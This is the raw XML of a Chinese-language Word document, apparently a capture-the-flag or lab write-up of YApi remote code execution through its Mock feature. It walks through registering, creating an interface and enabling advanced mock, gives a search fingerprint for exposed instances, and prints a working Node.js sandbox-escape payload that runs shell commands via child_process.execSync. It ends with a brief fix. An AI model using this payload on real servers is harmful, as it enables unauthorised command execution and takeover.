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1372" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="25"/>
        <w:ind w:left="251" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
          <w:color w:val="5F6166"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>yapi</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:color w:val="5F6166"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>代码执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="319" w:lineRule="auto" w:before="40"/>
        <w:ind w:left="120" w:right="1973" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
          <w:color w:val="545566"/>
          <w:sz w:val="19"/>
          <w:shd w:fill="EDEFF4" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>Api </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:color w:val="545566"/>
          <w:sz w:val="19"/>
          <w:shd w:fill="EDEFF4" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>服务，导致攻击者注册用户后，即可通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
          <w:color w:val="545566"/>
          <w:sz w:val="19"/>
          <w:shd w:fill="EDEFF4" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>Mock </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:color w:val="545566"/>
          <w:sz w:val="19"/>
          <w:shd w:fill="EDEFF4" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>功能远程执行任意代码。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
          <w:color w:val="545566"/>
          <w:sz w:val="19"/>
          <w:shd w:fill="EDEFF4" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>YApi&lt;=V1.92 All</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="343" w:lineRule="auto" w:before="21"/>
        <w:ind w:left="120" w:right="6303" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="545566"/>
          <w:sz w:val="19"/>
          <w:shd w:fill="EDEFF4" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>icon_hash="-715193973"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="545566"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="545566"/>
          <w:sz w:val="19"/>
          <w:shd w:fill="EDEFF4" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>app=“YApi”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="2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1143000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>176397</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5205046" cy="1938337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046" cy="1938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8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打开首页</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="556" w:lineRule="auto" w:before="43"/>
        <w:ind w:left="120" w:right="3803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1" simplePos="0" relativeHeight="251579392">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1143000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>653795</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5265420" cy="1487424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87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Yapi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>好像是一个前端模板注入，之前有做过类似的注册进入个人空间随便建立一个项目</w:t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5"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"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1143000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>158129</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5248039" cy="244792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8039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6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随便添加一个接口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1400" w:bottom="280" w:left="1680" w:right="1660"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText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2926080" cy="1470659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rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="2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1143000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>210661</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5299706" cy="147656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706" cy="147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78" w:lineRule="auto" w:before="79"/>
        <w:ind w:left="120" w:right="6346"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选中高级 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mock </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并打开用于注入 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>poc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:ind w:left="120"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>const sandbox = this</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:ind w:left="120"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>const ObjectConstructor = this.constructor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="292" w:lineRule="auto" w:before="56"/>
        <w:ind w:left="120" w:right="2923"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>const FunctionConstructor = ObjectConstructor.constructor const myfun = FunctionConstructor('return process')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="255" w:lineRule="exact"/>
        <w:ind w:left="120"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>const process = myfun()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="1288" w:val="left" w:leader="none"/>
          <w:tab w:pos="1732" w:val="left" w:leader="none"/>
          <w:tab w:pos="7643" w:val="left" w:leader="none"/>
          <w:tab w:pos="8267" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="55"/>
        <w:ind w:left="120"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>mockJson</w:t>
        <w:tab/>
        <w:t>=</w:t>
        <w:tab/>
        <w:t>process.mainModule.require("child_process").execSync("whoami</w:t>
        <w:tab/>
        <w:t>&amp;&amp;</w:t>
        <w:tab/>
        <w:t>ps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:ind w:left="120"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>-ef").toString()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="48"/>
        <w:ind w:left="120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1143000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>283591</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3055620" cy="220218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</w:rPr>
        <w:t>保存后打开链接显现出 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="160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其中 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>poc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的最后一行的 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>execwync </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>框是命令行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1580" w:bottom="280" w:left="1680" w:right="1660"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="120"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5105399" cy="1196340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399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/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/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1287780</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>102870</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2788919" cy="1386840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9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宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="69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修复：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="120"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mock </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="11910" w:h="16840"/>
      <w:pgMar w:top="1560" w:bottom="280" w:left="168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CD小栋</dc:creator>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-09-17T03:10:27Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-17T03:10:27Z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2021-09-17T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>